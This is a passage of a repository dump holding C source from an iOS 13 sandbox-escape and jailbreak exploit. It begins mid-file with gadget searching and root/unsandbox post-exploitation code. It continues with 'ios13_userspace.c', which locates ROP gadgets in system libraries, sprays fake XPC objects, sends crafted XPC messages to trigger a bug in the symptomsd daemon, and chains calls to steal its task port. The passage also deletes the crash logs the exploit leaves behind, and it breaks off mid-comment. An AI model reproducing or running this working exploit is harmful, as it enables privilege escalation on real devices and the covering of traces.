(uint64_t)memmem((void*)sect_data, sect_size, _bytes_gadget2, sizeof(_bytes_gadget2));\n    if(!find_gadget){\n        printf(\"Error in find_amfid_OFFSET_gadget(): if(!find_gadget)\\n\");\n        exit(1);\n    }\n    \n    return (find_gadget - sect_data) + sect_info->offset;\n}\n\nsize_t amfid_fsize = 0;\nuint8_t *map_file_to_mem(const char *path){\n    \n    struct stat fstat = {0};\n    stat(path, &fstat);\n    amfid_fsize = fstat.st_size;\n    \n    int fd = open(path, O_RDONLY);\n    uint8_t *mapping_mem = mmap(NULL, mach_vm_round_page(amfid_fsize), PROT_READ, MAP_SHARED, fd, 0);\n    if((int)mapping_mem == -1){\n        printf(\"Error in map_file_to_mem(): mmap() == -1\\n\");\n        exit(1);\n    }\n    return mapping_mem;\n}\n\n\n#pragma mark ---- Post-exp ---- Copy Jailbreak Resources\n\n\n#include <ifaddrs.h>\n#include <net/if.h>\n#include <arpa/inet.h>\n\nvoid display_ip_address(){\n    struct ifaddrs *interfaces = NULL;\n    struct ifaddrs *temp_addr = NULL;\n    if(getifaddrs(&interfaces) == 0){\n        temp_addr = interfaces;\n        while(temp_addr != NULL) {\n            if(temp_addr->ifa_addr->sa_family == AF_INET) {\n                \n                printf(\"    %s: \", temp_addr->ifa_name);\n                char *ip_addr = inet_ntoa(((struct sockaddr_in *)temp_addr->ifa_addr)->sin_addr);\n                printf(\"    %s\\n\", ip_addr);\n            }\n            temp_addr = temp_addr->ifa_next;\n        }\n        freeifaddrs(interfaces);\n    }else{\n        printf(\"Error: getifaddrs\\n\");\n    }\n}\n\nvoid remove_crash_thats_caused_by_exp(const char *name)\n{\n    DIR *dir;\n    struct dirent *entry;\n    \n    if (!(dir = opendir(name))){\n        return;\n    }\n    \n    while ((entry = readdir(dir)) != NULL) {\n        char path[1024];\n        snprintf(path, sizeof(path), \"%s/%s\", name, entry->d_name);\n        \n        if(!strncmp(entry->d_name, \"symptomsd-\", 10)){\n            remove(path); unlink(path);\n        }\n    }\n 
   closedir(dir);\n}\n\nvoid run_post_exp_from_tfp0(){\n    pth_commAttr_init();\n    Apply_hardcoded_addresses_and_offsets();\n    \n    our_proc_kAddr = find_proc_byPID(getpid());\n    our_task_kAddr = KernelRead_8bytes(our_proc_kAddr + OFFSET_bsd_info_task);\n    \n    safepatch_swap_unsandbox_and_root(our_proc_kAddr);\n    \n    printf(\"our uid: %d\\n\", getuid());\n    // Any any code here will get to run as root and no-sandbox!\n    \n    safepatch_unswap_unsandbox_and_root(our_proc_kAddr);\n}\n"
  },
  {
    "path": "Exploits/FreeTheSandbox/ios13_userspace.c",
    "content": "//\n//  ios13_userspace.c\n//  ios13_app1\n//\n//  Created by bb on 1/12/20.\n//  Copyright © 2020 bb. All rights reserved.\n//\n\n// Update* For 13.4/13.4.1 Support, started using AOP instead of ROP\n\n#if !__arm64e__\n\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n#include <string.h>\n#include <setjmp.h>\n#include <dlfcn.h>\n#include <sys/stat.h>\n#include <sys/mman.h>\n#include <mach/mach.h>\n#include <mach/vm_map.h>\n#include <mach-o/dyld.h>\n#include <mach-o/loader.h>\n#include <mach-o/dyld_images.h>\n#include <objc/runtime.h>\n#include <objc/message.h>\n#include <pthread/pthread.h>\n#include <copyfile.h>\n#include <CoreFoundation/CoreFoundation.h>\n#include <sys/time.h>\n#include <sys/utsname.h>\n#include \"IOKitLib.h\"\n#include \"xpc.h\"\n#include \"freethesandbox.h\"\n\nextern kern_return_t bootstrap_look_up(mach_port_t bp, char *service_name, mach_port_t *sp);\n\n#pragma pack(4)\n\n#define SPRAY_ADDRESS 0x150010000\n\n#define TARGET_MACH_SERVICE \"com.apple.usymptomsd\"\n#define TARGET_MACH_SERVICE_2 \"com.apple.symptoms.symptomsd.managed_events\"\n\n#define OF(offset) (offset)/sizeof(uint64_t)\n#define exit(X) longjmp(jmpb, 1)\n\njmp_buf jmpb;\n\n#define MACH_MSG_GUARD_FLAGS_NONE                   0x0000\n#define MACH_MSG_GUARD_FLAGS_IMMOVABLE_RECEIVE      0x0001    /* Move the receive right and mark it as immovable */\n#define MACH_MSG_GUARD_FLAGS_UNGUARDED_ON_SEND      0x0002    /* Verify that the port is unguarded */\n#define MACH_MSG_GUARD_FLAGS_MASK                   0x0003    /* Valid flag bits */\n\ntypedef unsigned int mach_msg_guard_flags_t;\n\n/*#define MACH_MSG_GUARDED_PORT_DESCRIPTOR        4\n #pragma pack(4)\n typedef struct{\n uint64_t                      context;\n mach_msg_guard_flags_t        flags : 16;\n mach_msg_type_name_t          disposition : 8;\n mach_msg_descriptor_type_t    type : 8;\n mach_port_name_t              name;\n } mach_msg_guarded_port_descriptor_t;\n */\n\n#pragma mark - 
Pre-exploitation - Our Mach Server\n\nmach_port_t our_serverport = 0;\nvoid Prepare_our_Mach_server(){\n    \n    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &our_serverport);\n    if(our_serverport == 0){\n        printf(\"Error occurred when mach_port_allocate: 0x%x!\\n\", kr);\n        exit();\n    }\n}\n\n#pragma mark - Pre-exploitation - dyldcache\n\nvoid *dylibcache_start = NULL;\nsize_t dylibcache_size = 0;\n\nbool isPartOf_dyldcache(vm_address_t addr){\n    vm_size_t size = 0;\n    natural_t depth = 0;\n    vm_region_submap_info_data_64_t info;\n    mach_msg_type_number_t info_cnt = VM_REGION_SUBMAP_INFO_COUNT_64;\n    if(vm_region_recurse_64(mach_task_self(), &addr, &size, &depth, (vm_region_info_t)&info, &info_cnt))\n        return false;\n    if(info.share_mode == SM_TRUESHARED)\n        return true;\n    return false;\n}\n\nsize_t Get_loaded_dylib_size(void *dylib_address){\n    \n    struct mach_header *mh = (struct mach_header*)dylib_address;\n    const uint32_t cmd_count = mh->ncmds;\n    struct load_command *cmds = (struct load_command*)((char*)mh+sizeof(struct mach_header_64));\n    struct load_command* cmd = cmds;\n    for (uint32_t i = 0; i < cmd_count; ++i){\n        switch (cmd->cmd) {\n            case LC_SEGMENT_64:{\n                struct segment_command_64 *seg = (struct segment_command_64*)cmd;\n                if(!strcmp(seg->segname,\"__TEXT\")){\n                    return seg->vmsize;\n                }\n            }\n                break;\n        }\n        cmd = (struct load_command*)((char*)cmd + cmd->cmdsize);\n    }\n    return 0;\n}\n\nvoid Find_dylibcache(){\n    \n    vm_address_t minAddr = 0;\n    vm_address_t maxAddr = 0;\n    \n    for (uint32_t i = 0; i < _dyld_image_count(); i++){\n        uint64_t addr = (uint64_t)_dyld_get_image_header(i);\n        const char *name = _dyld_get_image_name(i);\n        if(strncmp(name, \"/System/\", 8) && strncmp(name, \"/usr/\", 5))\n            
continue;\n        if(!isPartOf_dyldcache(addr))\n            continue;\n        if(!minAddr || addr < minAddr)\n            minAddr = addr;\n        if(addr > maxAddr)\n            maxAddr = addr;\n    }\n    \n    if(!minAddr||!maxAddr){\n        printf(\"dylibcache Not Ready!\\n\");\n        exit();\n    }\n    \n    size_t last_dylib_size = Get_loaded_dylib_size((void*)maxAddr);\n    \n    dylibcache_start = (void*)minAddr;\n    dylibcache_size = (size_t)((maxAddr + last_dylib_size) - minAddr);\n    \n    printf(\"Dylibcache range: %p - %p\\n\", dylibcache_start, dylibcache_start + dylibcache_size);\n}\n\n#pragma mark - Pre-exploitation - arm64 ROP gadgets\n\nuint64_t find_gadget(char *bytes, size_t len){\n    void *addr = memmem(dylibcache_start, dylibcache_size, bytes, len);\n    if(!addr){\n        printf(\"Gadget didn't find, len:0x%zx\\n\",len);\n        exit();\n    }\n    return (uint64_t)addr;\n}\n\nuint64_t find_gadget_speed(char *bytes, size_t len, void *findingRange_start, uint64_t findingRange_size){\n    void *addr = memmem(findingRange_start, findingRange_size, bytes, len);\n    if(!addr){\n        printf(\"Gadget didn't find, len:0x%zx\\n\",len);\n    }\n    return (uint64_t)addr;\n}\n\nchar _bytes_control_x0x2[] = {\n    0xF3, 0x03, 0x00, 0xAA, // mov    x19, x0\n    0x08, 0x00, 0x42, 0xA9, // ldp    x8, x0, [x0, #0x20]\n    0x61, 0x3A, 0x40, 0xB9, // ldr    w1, [x19, #0x38]\n    0x62, 0x1A, 0x40, 0xF9, // ldr    x2, [x19, #0x30]\n    0x00, 0x01, 0x3f, 0xd6, // blr x8\n}; // Found at CoreUtils`___WiFiSWAPStartCallBack_block_invoke: <+16>\n#define _Gadget_control_x0x2 find_gadget_speed(_bytes_control_x0x2,sizeof(_bytes_control_x0x2),findingRange_start,findingRange_size)\nuint64_t Gadget_control_x0x2 = 0;\n\nchar _bytes_memcopy[] = {\n    0x08, 0x00, 0x40, 0xB9, // ldr    w8, [x0]\n    0x68, 0x00, 0x00, 0xB9, // str    w8, [x3]\n    0xC0, 0x03, 0x5F, 0xD6, // ret\n}; // Found at libwebrtc.dylib`ScaleARGBRowDownEven_C: <+68>\n#define 
_Gadget_memcopy find_gadget_speed(_bytes_memcopy,sizeof(_bytes_memcopy),findingRange_start,findingRange_size)\nuint64_t Gadget_memcopy = 0;\n\n#define aop_FuncCALL(FUNC, ARG1, ARG2, ARG3, ARG4) \\\nspraymem[OF(_aop_FuncCALL_primer_offset)] = spray_start_address + _aop_FuncCALL_offset; \\\n{char *func_call_payload = ((char*)spraymem) + _aop_FuncCALL_offset; \\\n_aop_FuncCALL_primer_offset += 8; \\\n_aop_FuncCALL_offset += 0x74; \\\n*(uint32_t*)(func_call_payload + 20) = 53; \\\n*(uint64_t*)(func_call_payload) = 0; \\\n*(uint32_t*)(func_call_payload + 8) = 0; \\\nchar *tmp_ha = func_call_payload + 24; /* Saved an offset later gonna involves multiple time */ \\\n*(uint32_t*)(tmp_ha + 4) = 150; \\\n*(uint32_t*)(func_call_payload + 4) = 116; \\\n*(uint64_t*)(tmp_ha + 16) = FUNC; /* func ptr */ \\\n*(uint64_t*)(tmp_ha + 24) = ARG1; /* arg1 */ \\\n*(uint32_t*)(tmp_ha + 72) = ARG2; /* arg2 (Only 32bits)*/ \\\n*(uint64_t*)(tmp_ha + 76) = ARG3; /* arg3 */ \\\n*(uint64_t*)(tmp_ha + 84) = ARG4;} // arg4\n\n#define aop_FuncCALL_memcpy_32bits(dst, src) \\\naop_FuncCALL((void*)Gadget_memcopy, src, 0, 0, dst)\n\n#define aop_Insert_String(VAR, STR) \\\nsize_t _##VAR##_len = strlen(STR) + 1; \\\nuint64_t VAR = spray_start_address + _aop_data_offset; \\\nmemcpy((char*)spraymem + _aop_data_offset, STR, _##VAR##_len); \\\n_##VAR##_len = (~0xF) & (_##VAR##_len + 0xF); \\\n_aop_data_offset += _##VAR##_len;\n\n#define aop_Insert_Data(VAR, DATA, SIZE) \\\nsize_t _##VAR##_SIZE = SIZE; \\\nuint64_t VAR = spray_start_address + _aop_data_offset; \\\nmemcpy((char*)spraymem + _aop_data_offset, DATA, _##VAR##_SIZE); \\\n_##VAR##_SIZE = (~0xF) & (_##VAR##_SIZE + 0xF); \\\n_aop_data_offset += _##VAR##_SIZE;\n\nvoid Find_Gadgets_speed(){\n    \n#define _SEEK(V) if(!(V = _##V)){printf(\"No \"#V\" Found!\\n\");exit(0);}\n    \n    const char *target_lib_1 = \"/System/Library/PrivateFrameworks/CoreUtils.framework/CoreUtils\";\n    const char *target_lib_2 = 
\"/System/Library/PrivateFrameworks/WebCore.framework/Frameworks/libwebrtc.dylib\";\n    \n    dlopen(target_lib_1, RTLD_NOW);\n    dlopen(target_lib_2, RTLD_NOW);\n    \n    for (uint32_t i = 0; i < _dyld_image_count(); i++){\n        \n        const char *name = _dyld_get_image_name(i);\n        if(!strcmp(name, target_lib_1)){\n            \n            void *findingRange_start = (void*)_dyld_get_image_header(i);\n            uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n            _SEEK(Gadget_control_x0x2);\n        }\n        else if(!strcmp(name, target_lib_2)){\n            \n            void *findingRange_start = (void*)_dyld_get_image_header(i);\n            uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n            _SEEK(Gadget_memcopy);\n        }\n    }\n}\n\nuint32_t get_server_port(char *servername){\n    // Can use for check connection as well\n    uint32_t port = 0;\n    bootstrap_look_up(bootstrap_port, servername, &port);\n    if(!port){\n        printf(\"%s lookup failed\\n\", servername);\n        return 0;\n    }\n    printf(\"got server: 0x%x\\n\", port);\n    return port;\n}\n\nvoid mach_msg_conn_test(){\n    \n    printf(\"w\\n\");\n    mach_port_t server_port = get_server_port(\"\");\n    printf(\"server_port: 0x%x\\n\", server_port);\n    \n    struct routine1_msg{\n        mach_msg_header_t Head;\n        mach_msg_body_t msgh_body;\n        mach_msg_ool_descriptor_t ool;\n        mach_msg_port_descriptor_t port;\n        mach_msg_trailer_t trailer;\n    };\n    \n    struct routine1_msg *msg = malloc(sizeof(struct routine1_msg));\n    bzero(msg, sizeof(struct routine1_msg));\n    \n    mach_port_t reply_port = mig_get_reply_port();\n    \n    msg->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg->Head.msgh_size = 80;\n    msg->Head.msgh_remote_port = server_port;\n    msg->Head.msgh_local_port = reply_port;\n    
msg->Head.msgh_id = 0x6F0;\n    msg->msgh_body.msgh_descriptor_count = 2;\n    \n    mach_port_t shared_port_parent;\n    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &shared_port_parent);\n    \n    msg->port.name = server_port;\n    msg->port.disposition = MACH_MSG_TYPE_MOVE_SEND;\n    msg->port.type = MACH_MSG_PORT_DESCRIPTOR;\n    \n    msg->ool.address = \"AAAAAAAAA\";\n    msg->ool.size = 3;\n    msg->ool.copy = MACH_MSG_VIRTUAL_COPY;\n    msg->ool.deallocate = false;\n    msg->ool.type = MACH_MSG_OOL_DESCRIPTOR;\n    \n    int rt = mach_msg(msg, MACH_SEND_MSG|MACH_RCV_MSG, msg->Head.msgh_size, sizeof(struct routine1_msg), reply_port, 0, 0);\n    \n    if(rt == 0){\n        printf(\"reply: 0x%x\\n\", msg->Head.msgh_bits);\n        printf(\"reply size: %d\\n\", msg->Head.msgh_size);\n        \n        printf(\"id: %d\\n\", msg->Head.msgh_id);\n        \n    }else{\n        printf(\"msg err: 0x%x\\n\", rt);\n    }\n}\n\nvoid click_test_main(){\n    mach_msg_conn_test();\n}\n\nvoid xpc_conn_test(){\n    \n    xpc_connection_t ccc = xpc_connection_create_mach_service(\"com.apple.usymptomsd\", NULL, 0);\n    xpc_connection_set_event_handler(ccc, ^(xpc_object_t object) {\n        //printf(\"replyA\\n\");\n        //char *err = xpc_dictionary_get_string(object, XPC_ERROR_KEY_DESCRIPTION);\n        //printf(\"erra: %s\\n\", err);\n    });\n    xpc_connection_resume(ccc);\n    \n    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n    //xpc_dictionary_set_int64(msg, \"op\", 2);\n    //xpc_dictionary_set_int64(msg, \"dat1\", 66);\n    \n    size_t payload_len = 0x1;\n    char *payload = malloc(payload_len);\n    \n    xpc_dictionary_set_value(msg, \"payload\", xpc_data_create(payload, payload_len));\n    \n    xpc_connection_send_message_with_reply(ccc, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n        \n        pid_t server_pid = xpc_connection_get_pid(ccc);\n        printf(\"server pid: %d\\n\", server_pid);\n        \n       
 //printf(\"replyB: %s\\n\", xpc_copy_description(object));\n        \n    });\n}\n\nvoid xpc_conn_test_exp1(){\n    \n    xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.symptoms.symptomsd.managed_events\", NULL, 0);\n    xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n        //printf(\"replyA\\n\");\n        //char *err = xpc_dictionary_get_string(object, XPC_ERROR_KEY_DESCRIPTION);\n        //printf(\"erra: %s\\n\", err);\n    });\n    xpc_connection_resume(xpcconn);\n    \n    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n    xpc_dictionary_set_uint64(msg, \"type\", 2); // case 2/3\n    \n    xpc_object_t config_arr = xpc_array_create(NULL, 0);\n    xpc_dictionary_set_value(msg, \"config\", config_arr);\n    \n    xpc_object_t each_config = xpc_dictionary_create(NULL, NULL, 0);\n    // Parse by -[ConfigurationHandler read:returnedValues:]\n    xpc_array_append_value(config_arr, each_config);\n    \n    xpc_dictionary_set_string(each_config, \"GENERIC_CONFIG_TARGET\", \"com.apple.symptoms.test.request-passthrough\"); // [knownItems objectForKey: ???]\n    \n    xpc_object_t signature_arr = xpc_array_create(NULL, 0);\n    xpc_dictionary_set_value(each_config, \"TRIGGERED_SIGNATURES\", signature_arr); // Enter -[SimpleSymptomEvaluator configureInstance:]\n    \n    xpc_object_t each_signature = xpc_dictionary_create(NULL, NULL, 0);\n    xpc_array_append_value(signature_arr, each_signature);\n    \n    xpc_dictionary_set_string(each_signature, \"SIGNATURE_NAME\", \"HAHA\");\n    \n    xpc_dictionary_set_string(each_signature, \"SYNDROME_NAME\", \"HAHA2\");\n    xpc_dictionary_set_string(each_signature, \"ADDITIONAL_INFO_GENERATOR\", \"CertificateErrors\");\n    xpc_dictionary_set_string(each_signature, \"ADDITIONAL_INFO_SELECTOR\", \"conditionMinCount\");\n    \n    xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n        \n        //printf(\"replyB: 
%s\\n\", xpc_copy_description(object));\n        \n    });\n}\n\nvoid xpc_conn_test_forTrigger(){\n    \n    xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.symptoms.symptomsd.managed_events\", NULL, 0);\n    xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n        //printf(\"replyA\\n\");\n    });\n    xpc_connection_resume(xpcconn);\n    \n    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n    xpc_dictionary_set_uint64(msg, \"type\", 2); // case 2/3\n    \n    xpc_object_t config_arr = xpc_array_create(NULL, 0);\n    xpc_dictionary_set_value(msg, \"config\", config_arr);\n    \n    xpc_object_t each_config = xpc_dictionary_create(NULL, NULL, 0); // Parse by -[ConfigurationHandler read:returnedValues:]\n    xpc_array_append_value(config_arr, each_config);\n    \n    xpc_dictionary_set_string(each_config, \"GENERIC_CONFIG_TARGET\", \"CertificateErrors\"); // [knownItems objectForKey: ???]\n    \n    xpc_dictionary_set_string(each_config, \"REQUIRED_MINIMUM_COUNT\", \"5637210112\"); // Turn SPRAY_ADDRESS to Decimal\n    \n    xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n        //printf(\"replyB: %s\\n\", xpc_copy_description(object));\n    });\n}\n\n// Look up service: com.apple.usymptomsd\nuint8_t bootstrap_look_up_machmsg_bytes[244] = 
{0x13,0x15,0x13,0x0,0xf4,0x0,0x0,0x0,0x7,0x7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x10,0x43,0x50,0x58,0x40,0x5,0x0,0x0,0x0,0x0,0xf0,0x0,0x0,0xcc,0x0,0x0,0x0,0x8,0x0,0x0,0x0,0x73,0x75,0x62,0x73,0x79,0x73,0x74,0x65,0x6d,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x5,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x68,0x61,0x6e,0x64,0x6c,0x65,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x69,0x6e,0x73,0x74,0x61,0x6e,0x63,0x65,0x0,0x0,0x0,0x0,0x0,0xa0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x72,0x6f,0x75,0x74,0x69,0x6e,0x65,0x0,0x0,0x40,0x0,0x0,0xcf,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x66,0x6c,0x61,0x67,0x73,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x6e,0x61,0x6d,0x65,0x0,0x0,0x0,0x0,0x0,0x90,0x0,0x0,0x15,0x0,0x0,0x0,0x63,0x6f,0x6d,0x2e,0x61,0x70,0x70,0x6c,0x65,0x2e,0x75,0x73,0x79,0x6d,0x70,0x74,0x6f,0x6d,0x73,0x64,0x0,0x0,0x0,0x0,0x74,0x79,0x70,0x65,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x61,0x72,0x67,0x65,0x74,0x70,0x69,0x64,0x0,0x0,0x0,0x0,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0};\n\nuint8_t vm_remap_machmsg_bytes[92] = {0x13,0x15,0x0,0x80,0x5c,0x0,0x0,0x0,0x11,0x11,0x11,0x11,0x22,0x22,0x22,0x22,0x0,0x0,0x0,0x0,0xcd,0x12,0x0,0x0,0x1,0x0,0x0,0x0,0x3,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x13,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x33,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xf,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x40,0x0,0x0,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0};\n\nvoid Assemble_part2_AOP(uint64_t *spraymem, uint64_t spray_start_address){\n    \n    // Trigger vuln causing call objc_release with fake_xpcobj\n    char *fake_xpcobj = (char*)spraymem;\n    *(uint64_t*)fake_xpcobj = (uint64_t)dlsym((void*)-2, \"_xpc_type_file_transfer\");\n    *(uint32_t*)(fake_xpcobj + 0xC) = 0; // set retainCnt as 0, leads to _xpc_file_transfer_dispose\n    *(uint64_t*)(fake_xpcobj + 0x40) = spray_start_address + 0x48; // leads to _Block_release during 
disposal\n    \n    char *fake_Block = ((char*)spraymem) + 0x48;\n    char *fake_Block_core = fake_Block + 0x40;\n    \n    *(uint32_t*)(fake_Block + 0x8) = 0x3000000 | 0x2; // Necessary bits mask | retainCnt\n    *(uint64_t*)(fake_Block + 0x18) = (uint64_t)spray_start_address + 0x48 + 0x40;\n    \n    // First place got control of PC\n    *(uint64_t*)(fake_Block_core + 0x18) = Gadget_control_x0x2;\n    \n    // --- Execute control_x0x2 gadget\n    *(uint64_t*)(fake_Block + 0x20) = (uint64_t)dlsym((void*)-2, \"xpc_array_apply_f\"); // Next jmp\n    *(uint64_t*)(fake_Block + 0x28) = spray_start_address + 0x100 - 24; // Reset x0, point to our spray mem, explicitly, a crafted xpc array\n    *(uint64_t*)(fake_Block + 0x30) = (uint64_t)IODispatchCalloutFromMessage; // Reset x2\n    *(uint64_t*)(fake_Block + 0x38) = 0x0; // Reset w1 (Only 32bit)\n    \n    /*\n     Begin Array-Oriented-Programming function chain-calling\n     \n     Payload arrangement:\n     \n     0x0\n     ... Used during taking control of PC\n     0x100\n     ... AOP array object itself\n     0x118\n     ... For AOP data-use\n     0x1500\n     ... For AOP call-use\n     0x3E00\n     ... 
AOP array storage\n     0x4000\n     */\n    \n    uint32_t _aop_FuncCALL_primer_offset = 0x3E00;\n    uint32_t _aop_FuncCALL_offset = 0x1800;\n    uint32_t _aop_data_offset = 0x118; // offset is right after fake array\n    \n    // Craft a fake array, stru has changed and req size increased to 0x18 since iOS13, was 0x10\n    spraymem[OF(0x100)] = spray_start_address + _aop_FuncCALL_primer_offset; // Array internal pointer, point to stored objects pool\n    spraymem[OF(0x108)] = -1; // Array count, -1 causes the array to iterate endlessly  -1\n    spraymem[OF(0x110)] = 0; // new value introd since iOS13, keep it empty\n    \n    // --- Following are AOP data-use\n    \n    aop_Insert_Data(lookup_io_server_rawmsg, bootstrap_look_up_machmsg_bytes, sizeof(bootstrap_look_up_machmsg_bytes));\n    *(uint64_t*)(vm_remap_machmsg_bytes + 56) = 0x4000000; // size of iosurface\n    aop_Insert_Data(vm_remap_rawmsg, vm_remap_machmsg_bytes, sizeof(vm_remap_machmsg_bytes));\n    \n    struct {\n        mach_msg_header_t Head;\n        // Head.msgh_local_port: +12\n        mach_msg_body_t msgh_body;\n        mach_msg_port_descriptor_t our_recv_port;\n        // our_recv_port.name: +28\n        mach_msg_port_descriptor_t our_task_port;\n        // our_task_port.name: +40\n        mach_msg_port_descriptor_t IOSurfaceRoot_servport;\n        // IOSurfaceRoot_servport.name: +52\n        mach_msg_port_descriptor_t AppleAVE2Driver_servport;\n        // AppleAVE2Driver_servport.name: +64\n        mach_msg_trailer_t trailer;\n    }_remote_recvmsg = {0}; // Size: 84\n    _remote_recvmsg.Head.msgh_size = sizeof(_remote_recvmsg);\n    \n    struct {\n        mach_msg_header_t Head;\n        // Head.msgh_local_port: +12\n        mach_msg_trailer_t trailer;\n    }_remote_recvmsg2 = {0}; // Size: 32\n    _remote_recvmsg2.Head.msgh_size = sizeof(_remote_recvmsg2);\n    \n    struct {\n        mach_msg_header_t Head;\n        // Head.msgh_local_port: +12\n        uint64_t remote_map_addr;\n        
// remote_map_addr: +24\n        mach_msg_trailer_t trailer;\n    }_remote_recvmsg3 = {0}; // Size: 56\n    _remote_recvmsg3.Head.msgh_size = sizeof(_remote_recvmsg3);\n    \n    struct {\n        mach_msg_header_t Head;\n        // Head.msgh_remote_port +8\n        mach_msg_body_t msgh_body;\n        mach_msg_port_descriptor_t port_send_to_us;\n        // port_send_to_us.name +28\n    }_remote_sendmsg = {0};\n    _remote_sendmsg.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    _remote_sendmsg.Head.msgh_size = sizeof(_remote_sendmsg);\n    _remote_sendmsg.msgh_body.msgh_descriptor_count = 1;\n    _remote_sendmsg.port_send_to_us.name = mach_task_self();\n    _remote_sendmsg.port_send_to_us.disposition = MACH_MSG_TYPE_MOVE_SEND;\n    _remote_sendmsg.port_send_to_us.type = MACH_MSG_PORT_DESCRIPTOR;\n    \n    struct {\n        mach_msg_header_t Head;\n    }_remote_sendmsg2 = {0};\n    _remote_sendmsg2.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    _remote_sendmsg2.Head.msgh_size = sizeof(_remote_sendmsg2);\n    \n    struct {\n        mach_msg_header_t Head;\n        uint64_t send_remap_addr_to_us;\n        // send_remap_addr_to_us: +24\n    }_remote_sendmsg3 = {0};\n    _remote_sendmsg3.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    _remote_sendmsg3.Head.msgh_size = sizeof(_remote_sendmsg3);\n    \n    aop_Insert_Data(remote_recvmsg, &_remote_recvmsg, sizeof(_remote_recvmsg));\n    aop_Insert_Data(remote_recvmsg2, &_remote_recvmsg2, sizeof(_remote_recvmsg2));\n    aop_Insert_Data(remote_recvmsg3, &_remote_recvmsg3, sizeof(_remote_recvmsg3));\n    aop_Insert_Data(remote_sendmsg, &_remote_sendmsg, sizeof(_remote_sendmsg));\n    aop_Insert_Data(remote_sendmsg2, &_remote_sendmsg2, sizeof(_remote_sendmsg2));\n    aop_Insert_Data(remote_sendmsg3, &_remote_sendmsg3, sizeof(_remote_sendmsg3));\n    \n    // --- 
Following are AOP code-use\n    \n    // Call bootstrap_look_up to retri listening port\n    aop_FuncCALL(mach_port_allocate, mach_task_self(), MACH_PORT_RIGHT_RECEIVE, lookup_io_server_rawmsg + offsetof(mach_msg_header_t, msgh_local_port), 0);\n    aop_FuncCALL(mach_msg_send, lookup_io_server_rawmsg, 0, 0, 0);\n    aop_FuncCALL(mach_msg_receive, lookup_io_server_rawmsg, 0, 0, 0);\n    \n    aop_FuncCALL_memcpy_32bits(remote_recvmsg + offsetof(mach_msg_header_t, msgh_local_port), lookup_io_server_rawmsg + 28);\n    aop_FuncCALL(mach_msg_receive, remote_recvmsg, 0, 0, 0);\n    aop_FuncCALL_memcpy_32bits(remote_recvmsg2+12, remote_recvmsg+12);\n    aop_FuncCALL_memcpy_32bits(remote_recvmsg3+12, remote_recvmsg+12);\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg+8, remote_recvmsg+28);\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg2+8, remote_recvmsg+28);\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg3+8, remote_recvmsg+28);\n    \n    aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+8, remote_recvmsg+40);\n    aop_FuncCALL(mach_port_allocate, mach_task_self(), MACH_PORT_RIGHT_RECEIVE, vm_remap_rawmsg + offsetof(mach_msg_header_t, msgh_local_port), 0);\n    \n    aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0); // To inform us that pwned proc got the msg contains our port\n    \n    // Then passing own task port to us\n    aop_FuncCALL(mach_msg_send, remote_sendmsg, 0, 0, 0);\n    /*\n     Reason of doing this, instead like in iOS12 exploit, open IO service port via IOServiceOpen and passing to us directly.\n     iOS 13 added new mitigation prevent all IOUserClient (obtain via IOServiceOpen) port from moving to other ipc space, namely diff tasks.\n     \n     I supposed these port are marked as guarded port.\n     \n     Example crash:\n     Exception Type:  EXC_GUARD\n     Exception Subtype: GUARD_TYPE_MACH_PORT\n     Exception Message:  on mach port 84999 (guarded with 0x0000000000000000)\n     Exception Note:  SIMULATED (this is NOT a crash)\n     \n     Way to get 
